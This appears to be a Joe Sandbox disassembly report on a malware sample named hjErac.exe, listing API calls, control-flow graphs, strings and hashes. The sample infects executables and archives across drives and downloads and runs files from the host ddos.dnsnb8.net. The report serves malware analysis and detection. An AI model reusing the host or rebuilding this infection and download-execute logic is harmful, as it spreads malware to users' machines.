                                                                              • Opcode Fuzzy Hash: be36a353cb9deee03c6c014b2a24d1824b1787c1cf4e147cd011448e435c99f8
                                                                              • Instruction Fuzzy Hash: 134175B2404399AFD721EBA0EC49EDFB7ACEF84315F040929F955C3111E635D74897A2

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 216 cb1718-cb1733 GetSystemTimeAsFileTime 217 cb1735-cb1752 SHSetValueA 216->217 218 cb1754-cb1758 216->218 219 cb17c6-cb17cd 217->219 218->219 220 cb175a-cb1784 SHGetValueA 218->220 220->219 221 cb1786-cb17b3 call cb2cf0 * 2 220->221 221->219 226 cb17b5 221->226 227 cb17bf 226->227 228 cb17b7-cb17bd 226->228 227->219 228->219 228->227
                                                                              APIs
                                                                              • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\hjErac.exe), ref: 00CB1729
                                                                              • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00CB174C
                                                                              • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00CB177C
                                                                              • __aulldiv.LIBCMT ref: 00CB1796
                                                                              • __aulldiv.LIBCMT ref: 00CB17A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: TimeValue__aulldiv$FileSystem
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\hjErac.exe$SOFTWARE\GTplus$Time
                                                                              • API String ID: 541852442-2231873215
                                                                              • Opcode ID: 201a708edebfcc0b8b676afa751ae1c830fdca89ac2208d419e696a3bb280662
                                                                              • Instruction ID: 5b7781af394eb0c9b15056ad1086ec939e4ef66bdc4e6fa0c37176f63cc72751
                                                                              • Opcode Fuzzy Hash: 201a708edebfcc0b8b676afa751ae1c830fdca89ac2208d419e696a3bb280662
                                                                              • Instruction Fuzzy Hash: 5F115E72A40249BBEF20DA94CC9AFEF7BBCEB44B14F508125FD10B6181DA759A448B60

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 322 cb2b8c-cb2bc6 memset GetLogicalDriveStringsA 323 cb2c09-cb2c28 WaitForMultipleObjects 322->323 324 cb2bc8-cb2bcc 322->324 327 cb2c2a-cb2c3a CreateThread 323->327 328 cb2c3c-cb2c45 323->328 325 cb2bfa-cb2c07 lstrlen 324->325 326 cb2bce-cb2bd0 324->326 325->323 325->324 326->325 329 cb2bd2-cb2bdc GetDriveTypeA 326->329 327->328 329->325 330 cb2bde-cb2be1 329->330 330->325 331 cb2be3-cb2bf6 CreateThread 330->331 331->325
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00CB2BA6
                                                                              • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00CB2BB4
                                                                              • GetDriveTypeA.KERNEL32(?), ref: 00CB2BD3
                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00CB2BEE
                                                                              • lstrlen.KERNEL32(?), ref: 00CB2BFB
                                                                              • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00CB2C16
                                                                              • CreateThread.KERNEL32(00000000,00000000,00CB2845,00000000,00000000,00000000), ref: 00CB2C3A
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                                                              • String ID:
                                                                              • API String ID: 1073171358-0
                                                                              • Opcode ID: 07bfdcbf8559df623c3f89696e7e7b128eb18a23586f3ba7f4752f9948fb351f
                                                                              • Instruction ID: f5a0240dbfba57492147067ccf5e3b277491e532d493a2ede13d1a2e0c314d4c
                                                                              • Opcode Fuzzy Hash: 07bfdcbf8559df623c3f89696e7e7b128eb18a23586f3ba7f4752f9948fb351f
                                                                              • Instruction Fuzzy Hash: EA2190B184019CAFEB20AF64AC84FEE7B6DFF05344F140629F96293161D7349E06CB61

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 16 cb1e6e-cb1e95 call cb2d60 19 cb1e9c-cb1eaa call cb1df6 16->19 20 cb1e97 call cb1d8a 16->20 24 cb2332 19->24 25 cb1eb0-cb1ed9 SetFileAttributesA CreateFileA 19->25 20->19 27 cb2338-cb233b 24->27 25->24 26 cb1edf-cb1f28 call cb1915 SetFilePointer CreateFileMappingA MapViewOfFile 25->26 26->24 34 cb1f2e-cb1f39 26->34 29 cb233d-cb2340 UnmapViewOfFile 27->29 30 cb2346-cb2349 27->30 29->30 32 cb234b-cb234e CloseHandle 30->32 33 cb2350-cb2354 30->33 32->33 35 cb2391-cb239a call cb2d9b 33->35 36 cb2356-cb235b CloseHandle 33->36 34->24 37 cb1f3f-cb1f56 34->37 36->35 37->24 39 cb1f5c-cb1f64 37->39 39->24 41 cb1f6a-cb1f70 39->41 41->24 42 cb1f76-cb1f87 call cb1c81 41->42 42->24 45 cb1f8d-cb1fa7 call cb185b call cb1c81 42->45 45->24 50 cb1fad-cb1fb4 45->50 51 cb1fb6-cb1fc5 call cb1af9 50->51 52 cb2024-cb2045 50->52 51->52 59 cb1fc7-cb1fd2 51->59 52->24 54 cb204b-cb204e 52->54 56 cb2070-cb20f4 call cb1af9 * 2 call cb1c68 * 2 memset * 2 54->56 57 cb2050-cb2053 54->57 78 cb20f5-cb20fe 56->78 58 cb2056-cb205a 57->58 58->56 61 cb205c-cb2061 58->61 59->24 62 cb1fd8-cb1fe7 59->62 61->24 64 cb2067-cb206e 61->64 65 cb1fe9-cb1fec 62->65 66 cb1fef-cb2006 call cb1af9 62->66 64->58 65->66 73 cb2008-cb200e call cb1c68 66->73 74 cb2013-cb201e FlushViewOfFile 66->74 73->74 74->52 79 cb2130-cb2139 78->79 80 cb2100-cb2114 78->80 81 cb213c-cb2142 79->81 82 cb212d-cb212e 80->82 83 cb2116-cb212a 80->83 84 cb215c 81->84 85 cb2144-cb2150 81->85 82->78 83->82 88 cb215f-cb2162 84->88 86 cb2152-cb2154 85->86 87 cb2157-cb215a 85->87 86->87 87->81 89 cb2181-cb2184 88->89 90 cb2164-cb2171 88->90 93 cb218d-cb21ba call cb1c68 89->93 94 cb2186 89->94 91 cb232a-cb232d 90->91 92 cb2177-cb217e 90->92 91->88 92->89 97 cb21bc-cb21d0 call cb1c68 93->97 98 cb21d3-cb220b call cb1c81 call cb1c68 93->98 94->93 97->98 105 cb221b-cb221e 98->105 106 cb220d-cb2218 call cb1c68 98->106 108 cb2220-cb2223 105->108 109 cb2226-cb2328 memcpy UnmapViewOfFile CloseHandle call cb1b8a call cb185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call cb1915 CloseHandle 105->109 106->105 108->109 109->27
                                                                              APIs
                                                                              • SetFileAttributesA.KERNEL32(?,00000080,?,00CB32B0,00000164,00CB2986,?), ref: 00CB1EB9
                                                                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00CB1ECD
                                                                              • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00CB1EF3
                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00CB1F07
                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00CB1F1D
                                                                              • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00CB201E
                                                                              • memset.MSVCRT ref: 00CB20D8
                                                                              • memset.MSVCRT ref: 00CB20EA
                                                                              • memcpy.MSVCRT(?,?,00000028,?,?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00CB222D
                                                                              • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00CB2238
                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00CB224A
                                                                              • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00CB22C6
                                                                              • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00CB22CB
                                                                              • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00CB22DD
                                                                              • WriteFile.KERNEL32(000000FF,00CB4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00CB22F7
                                                                              • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00CB230D
                                                                              • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00CB2322
                                                                              • UnmapViewOfFile.KERNEL32(?,?,00CB32B0,00000164,00CB2986,?), ref: 00CB2340
                                                                              • CloseHandle.KERNEL32(?,?,00CB32B0,00000164,00CB2986,?), ref: 00CB234E
                                                                              • CloseHandle.KERNEL32(000000FF,?,00CB32B0,00000164,00CB2986,?), ref: 00CB2359
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
                                                                              • String ID:
                                                                              • API String ID: 3043204753-0
                                                                              • Opcode ID: 501b7d67a1a2e56113b41801fbf0a71b9ff46652cb0bdd20bf46be9d3be5527b
                                                                              • Instruction ID: 10276ef50903ba388e624d9a08d3b82df896fb43dc20c9b1358b6d91e99db79b
                                                                              • Opcode Fuzzy Hash: 501b7d67a1a2e56113b41801fbf0a71b9ff46652cb0bdd20bf46be9d3be5527b
                                                                              • Instruction Fuzzy Hash: 1AF16B71900209EFCB24DFA8DC95AEDBBB5FF08314F50452AE919A7661D730AE81DF50

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 117 cb1973-cb199a PathFileExistsA 118 cb19a0-cb19aa 117->118 119 cb1ac7-cb1acc 117->119 120 cb19af-cb19c2 CreateFileA 118->120 121 cb1ace 119->121 122 cb1ad0-cb1ad5 119->122 123 cb1a28-cb1a36 GetFileSize 120->123 124 cb19c4-cb19d3 Sleep 120->124 121->122 125 cb1af0-cb1af6 122->125 126 cb1ad7-cb1ad9 122->126 128 cb1a38-cb1a3b 123->128 129 cb1a87-cb1a8b 123->129 124->120 127 cb19d5-cb1a0b call cb185b wsprintfA CopyFileA 124->127 126->125 127->123 141 cb1a0d-cb1a26 CreateFileA 127->141 128->129 133 cb1a3d-cb1a51 VirtualAlloc 128->133 130 cb1a8d-cb1a90 CloseHandle 129->130 131 cb1a96-cb1a9a 129->131 130->131 134 cb1aad-cb1ab1 131->134 135 cb1a9c 131->135 133->129 137 cb1a53-cb1a57 133->137 139 cb1adb-cb1ae0 134->139 140 cb1ab3-cb1ab6 134->140 138 cb1aa0-cb1aa7 DeleteFileA 135->138 142 cb1a59-cb1a6d ReadFile 137->142 143 cb1a80 137->143 138->134 144 cb1ae2-cb1ae5 139->144 145 cb1ae7-cb1aec 139->145 140->119 147 cb1ab8-cb1ac1 VirtualFree 140->147 141->123 148 cb1a9e 141->148 142->129 146 cb1a6f-cb1a7e 142->146 143->129 144->145 145->125 149 cb1aee 145->149 146->142 146->143 147->119 148->138 149->125
                                                                              APIs
                                                                              • PathFileExistsA.SHLWAPI(00CB4E5C,00000000,C:\Users\user\AppData\Local\Temp\hjErac.exe), ref: 00CB1992
                                                                              • CreateFileA.KERNEL32(00CB4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00CB19BA
                                                                              • Sleep.KERNEL32(00000064), ref: 00CB19C6
                                                                              • wsprintfA.USER32 ref: 00CB19EC
                                                                              • CopyFileA.KERNEL32(00CB4E5C,?,00000000), ref: 00CB1A00
                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB1A1E
                                                                              • GetFileSize.KERNEL32(00CB4E5C,00000000), ref: 00CB1A2C
                                                                              • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00CB1A46
                                                                              • ReadFile.KERNEL32(00CB4E5C,00CB4E60,00000000,?,00000000), ref: 00CB1A65
                                                                              • CloseHandle.KERNEL32(000000FF), ref: 00CB1A90
                                                                              • DeleteFileA.KERNEL32(?), ref: 00CB1AA7
                                                                              • VirtualFree.KERNEL32(00CB4E60,00000000,00008000), ref: 00CB1AC1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: File$CreateVirtual$AllocCloseCopyDeleteExistsFreeHandlePathReadSizeSleepwsprintf
                                                                              • String ID: %s%.8X.data$2$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\hjErac.exe
                                                                              • API String ID: 716042067-3613196364
                                                                              • Opcode ID: dfa491d6af305661e258e3b335375ece4f25b608d2a50ba1ad72aa35abac20d9
                                                                              • Instruction ID: 5a769f3bc58740cc208b00ef2be4a66c436937394ab0d575bf5d1072e2d7f5be
                                                                              • Opcode Fuzzy Hash: dfa491d6af305661e258e3b335375ece4f25b608d2a50ba1ad72aa35abac20d9
                                                                              • Instruction Fuzzy Hash: 49514C71901259AFCF109F98DC94AEEBBB8EF04354F544669F925E6190D330AF41DBA0

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 150 cb28b8-cb28ff memset wsprintfA 151 cb29db-cb29df 150->151 152 cb2905-cb290d 150->152 152->151 153 cb2913-cb2919 152->153 154 cb291b-cb294c memset wsprintfA call cb29e2 153->154 155 cb2956-cb2965 strrchr 153->155 158 cb2951 154->158 155->151 157 cb2967-cb2978 lstrcmpiA 155->157 159 cb297a-cb2981 call cb1e6e 157->159 160 cb2988-cb2992 lstrcmpiA 157->160 158->151 163 cb2986 159->163 160->151 162 cb2994-cb299b 160->162 164 cb29ad-cb29c9 strstr 162->164 165 cb299d-cb29a3 162->165 163->151 167 cb29cb-cb29d1 call cb239d 164->167 168 cb29d3-cb29d6 call cb2692 164->168 165->164 166 cb29a5-cb29a7 lstrcpy 165->166 166->164 167->151 168->151
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00CB28D3
                                                                              • wsprintfA.USER32 ref: 00CB28F7
                                                                              • memset.MSVCRT ref: 00CB2925
                                                                              • wsprintfA.USER32 ref: 00CB2940
                                                                                • Part of subcall function 00CB29E2: memset.MSVCRT ref: 00CB2A02
                                                                                • Part of subcall function 00CB29E2: wsprintfA.USER32 ref: 00CB2A1A
                                                                                • Part of subcall function 00CB29E2: memset.MSVCRT ref: 00CB2A44
                                                                                • Part of subcall function 00CB29E2: lstrlen.KERNEL32(?), ref: 00CB2A54
                                                                                • Part of subcall function 00CB29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00CB2A6C
                                                                                • Part of subcall function 00CB29E2: strrchr.MSVCRT ref: 00CB2A7C
                                                                                • Part of subcall function 00CB29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00CB2A9F
                                                                                • Part of subcall function 00CB29E2: lstrlen.KERNEL32(Documents and Settings), ref: 00CB2AAE
                                                                                • Part of subcall function 00CB29E2: memset.MSVCRT ref: 00CB2AC6
                                                                                • Part of subcall function 00CB29E2: memset.MSVCRT ref: 00CB2ADA
                                                                                • Part of subcall function 00CB29E2: FindFirstFileA.KERNEL32(?,?), ref: 00CB2AEF
                                                                                • Part of subcall function 00CB29E2: memset.MSVCRT ref: 00CB2B13
                                                                              • strrchr.MSVCRT ref: 00CB2959
                                                                              • lstrcmpiA.KERNEL32(00000001,exe), ref: 00CB2974
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                                                              • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                                                              • API String ID: 3004273771-3007274656
                                                                              • Opcode ID: a1b6d3670362cc468d26b30dec4c152de35cdf3b96b51fd91363fe692745f3a0
                                                                              • Instruction ID: 62e255d6b4acc3b5bf7acd8dd77b1f9e949a4b0086c02ca8db40291a9ee3d707
                                                                              • Opcode Fuzzy Hash: a1b6d3670362cc468d26b30dec4c152de35cdf3b96b51fd91363fe692745f3a0
                                                                              • Instruction Fuzzy Hash: AD31F972D4436CBBDB20A765DC89FDE776C9F14750F040462F549A3081E6B4EBC49BA1

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 172 cb1099-cb10b4 173 cb10ba-cb10c7 172->173 174 cb1199-cb119c 172->174 175 cb10c8-cb10d4 173->175 176 cb10da 175->176 177 cb1184-cb1190 175->177 178 cb1113-cb1162 call cb185b wsprintfA * 2 URLDownloadToFileA 176->178 177->175 179 cb1196-cb1198 177->179 182 cb1168-cb1182 lstrlen Sleep 178->182 183 cb10dc-cb110d call cb1000 WinExec lstrlen 178->183 179->174 182->177 182->178 183->178 183->179
                                                                              APIs
                                                                                • Part of subcall function 00CB185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00CB1118), ref: 00CB1867
                                                                                • Part of subcall function 00CB185B: srand.MSVCRT ref: 00CB1878
                                                                                • Part of subcall function 00CB185B: rand.MSVCRT ref: 00CB1880
                                                                                • Part of subcall function 00CB185B: srand.MSVCRT ref: 00CB1890
                                                                                • Part of subcall function 00CB185B: rand.MSVCRT ref: 00CB1894
                                                                              • WinExec.KERNEL32(?,00000005), ref: 00CB10F1
                                                                              • lstrlen.KERNEL32(00CB4748), ref: 00CB10FA
                                                                              • wsprintfA.USER32 ref: 00CB112A
                                                                              • wsprintfA.USER32 ref: 00CB1143
                                                                              • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00CB115B
                                                                              • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00CB1169
                                                                              • Sleep.KERNEL32 ref: 00CB1179
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                                                              • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                              • API String ID: 1280626985-3050893656
                                                                              • Opcode ID: ba97eeaccd4a3d1cd6fdd8d0d404c4dca1d377b6162b4b3e860736aef88ebcac
                                                                              • Instruction ID: 112df104d768da4babe29bad34f38212c5649bb87d5b25e76311fbe31f4c5e45
                                                                              • Opcode Fuzzy Hash: ba97eeaccd4a3d1cd6fdd8d0d404c4dca1d377b6162b4b3e860736aef88ebcac
                                                                              • Instruction Fuzzy Hash: F721AC71804248BEDB24EBA0EC58BEEBBBCAB01315F5501A5E900A3051D7749B84CF60

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 00CB164F
                                                                              • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00CB165B
                                                                              • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\hjErac.exe,00000104), ref: 00CB166E
                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 00CB16AC
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00CB16BD
                                                                                • Part of subcall function 00CB139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\hjErac.exe), ref: 00CB13BC
                                                                                • Part of subcall function 00CB139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00CB13DA
                                                                                • Part of subcall function 00CB139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00CB1448
                                                                              • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\hjErac.exe), ref: 00CB16E5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\hjErac.exe$C:\Windows\system32$Documents and Settings
                                                                              • API String ID: 123563730-3585991123
                                                                              • Opcode ID: 33b1d8fc83e6ac6cdab0ce17e611d6eebda2605ef7653fb3d5892910d544de0d
                                                                              • Instruction ID: 617c4b22dc3e3e3f35aad708845b5b4ea54f0fcdc20d440eedee065b796e859a
                                                                              • Opcode Fuzzy Hash: 33b1d8fc83e6ac6cdab0ce17e611d6eebda2605ef7653fb3d5892910d544de0d
                                                                              • Instruction Fuzzy Hash: 1A11D371544264BBCF2077A4AD4DFDF3F6DEF15362F440211FA09A10A1CA708A40D7A1

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 205 cb1000-cb1023 CreateFileA 206 cb1092-cb1096 205->206 207 cb1025-cb1055 GetFileSize CreateFileMappingA MapViewOfFile 205->207 208 cb107b-cb1085 207->208 209 cb1057-cb105f 207->209 212 cb108d-cb1091 CloseHandle 208->212 213 cb1087-cb108b CloseHandle 208->213 210 cb1061-cb106e call cb17d0 209->210 211 cb1074-cb1075 UnmapViewOfFile 209->211 210->211 211->208 212->206 213->212
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00CB10E8,?), ref: 00CB1018
                                                                              • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75BF8400,?,http://%s:%d/%s/%s,00CB10E8,?), ref: 00CB1029
                                                                              • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00CB1038
                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00CB10E8,?), ref: 00CB104B
                                                                              • UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00CB10E8,?), ref: 00CB1075
                                                                              • CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00CB10E8,?), ref: 00CB108B
                                                                              • CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00CB10E8,?), ref: 00CB108E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                                                              • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                              • API String ID: 1223616889-3273462101
                                                                              • Opcode ID: 35c02bc93f08a08e8f81fa77f5328348e7baaa7411d59b618edf9fd9dd66e7b9
                                                                              • Instruction ID: 9c5ed3734835a0639ab51ecd496c88458b9bcbde79251e722cb7610aeb6a635f
                                                                              • Opcode Fuzzy Hash: 35c02bc93f08a08e8f81fa77f5328348e7baaa7411d59b618edf9fd9dd66e7b9
                                                                              • Instruction Fuzzy Hash: AC0161B110429CBFE7307F60ACC8F6BBBACDF44799F054629F655A2090DA705E448B70

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
